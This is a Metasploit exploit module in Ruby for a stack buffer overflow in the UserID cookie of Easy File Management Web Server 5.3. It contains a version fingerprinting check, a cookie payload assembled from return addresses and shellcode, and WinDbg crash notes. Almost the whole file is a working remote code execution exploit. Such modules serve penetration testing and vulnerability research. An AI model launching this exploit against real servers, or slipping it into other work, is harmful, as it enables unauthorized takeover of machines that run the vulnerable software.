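##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Easy File Management Web Server v5.3 "UserID" cookie stack buffer overflow.
#
# The User ID cookie value is copied onto the stack without length validation
# (see the debugger notes at the bottom of the file), which lets an
# over-long cookie overwrite a pointer that is dereferenced later on.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking # Reliable memory corruption

  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options.
  #
  # @param info [Hash] module info supplied by the framework; merged via update_info.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy File Management Web Server v5.3 Stack Buffer Overflow',
      'Description'    => %q{
        Easy File Management Web Server contains a stack buffer overflow condition
        that is triggered as user-supplied input is not properly validated when
        handling the User ID cookie. This may allow a remote attacker to execute
        arbitrary code.
      },
      'Author'         =>
        [
          'superkojiman',  # Vulnerability discovery
          'Julien Ahrens', # Exploit
          'TecR0c '        # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '107241'],
          ['EDB', '33610'],
          ['BID', '67542'],
          ['URL', 'http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536'],
          ['URL', 'http://www.web-file-management.com/']
        ],
      # 'Platform' was previously listed twice in this hash (a duplicated key);
      # it is declared once here.
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process'
        },
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d;",
          'Space'    => 3420 # Lets play it safe
        },
      'Targets'        =>
        [
          # Successfully tested efmws.exe (5.3.0.0) on:
          # -- Microsoft Windows XP [Version 5.1.2600]
          # -- Microsoft Windows [Version 6.1.7600]
          # -- Microsoft Windows [Version 6.3.9600]
          [ 'efmws 5.3 Windows Universal', { 'Ret' => 0x10010101 } ] # PPR from ImageLoad.dll
        ],
      'DisclosureDate' => 'May 20 2014',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path of an existing resource', '/vfolder.ghp'])
      ], self.class)
  end

  # Fingerprints the target.
  #
  # Reads /whatsnew.txt to extract the product version; falls back to the
  # "Server" header, which still reports "4.0" for version 5.3.
  #
  # @return [Exploit::CheckCode] Unknown when there is no response, Appears for
  #   version 5.3, Detected when only the Server header matches, Safe otherwise.
  def check
    #
    # NOTE: Version 5.3 still reports "4.0" in the "Server" header
    #
    res = send_request_raw('uri' => '/whatsnew.txt')

    # A nil response (no answer / connection failure) is not a version match.
    unless res
      vprint_status "#{peer} - No response to request"
      return Exploit::CheckCode::Unknown
    end

    if res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
      version = Regexp.last_match(1)
      vprint_status "#{peer} - Found version: #{version}"
      return Exploit::CheckCode::Appears if version == '5.3'
    end

    if res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Builds the request that triggers the overflow and sends it.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the target does not
  #   appear to be running the vulnerable version.
  def exploit
    #
    # Abort if the target doesn't appear to be vulnerable.
    # NOTE: a "Detected" result (Server header only) is accepted as well, in
    # case whatsnew.txt is not reachable.
    #
    # Both codes are compared explicitly: a bare `|| CheckCode::Detected`
    # is always truthy and would make this guard dead code.
    #
    code = check
    unless code == Exploit::CheckCode::Appears || code == Exploit::CheckCode::Detected
      fail_with(Failure::NoTarget, "#{peer} - Target does not appear to be running fmws 5.3")
    end

    #
    # Fu to JMP ESP where payload lives
    # NOTE: Opcode 'JMP ESP' only existed in V5.3
    #
    sploit = rand_text(80)
    sploit << [0x1001D8C8].pack("V")
    sploit << rand_text(280)
    sploit << [target.ret].pack("V")
    sploit << [0xA445ABCF].pack("V")
    sploit << [0x10010125].pack("V")
    sploit << [0x10022AAC].pack("V")
    sploit << rand_text(8)
    sploit << [0x1001A187].pack("V")
    sploit << [0x1002466D].pack("V")
    sploit << payload.encoded

    print_status "#{peer} - Trying target #{target.name}..."

    #
    # NOTE: Successful HTTP request is required to trigger
    #
    send_request_cgi({
      'uri'    => normalize_uri(target_uri.path),
      'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;",
    }, 5)
  end
end

=begin
#
# 0x44f57d This will write UserID up the stack. If the UserID is too large it
# will overwrite a pointer which is used later on at 0x468702
#
eax=000007d1 ebx=00000000 ecx=000001f4 edx=016198ac esi=01668084 edi=016198ac
eip=0044f57d esp=016197e8 ebp=ffffffff iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
fmws+0x4f57d:
0044f57d f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

0:004> dd @esi
01668084  41414141 41414141 41414141 41414141
01668094  41414141 41414141 41414141 41414141
016680a4  41414141 41414141 41414141 41414141
016680b4  41414141 41414141 41414141 41414141
016680c4  41414141 41414141 41414141 41414141
016680d4  41414141 41414141 41414141 41414141
016680e4  41414141 41414141 41414141 41414141
016680f4  41414141 41414141 41414141 41414141

(c38.8cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=015198fc edx=41414141 esi=015198ec edi=015198fc
eip=00468702 esp=015197c0 ebp=ffffffff iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
fmws+0x68702:
00468702 ff5228          call    dword ptr [edx+28h]  ds:0023:41414169=????????
=end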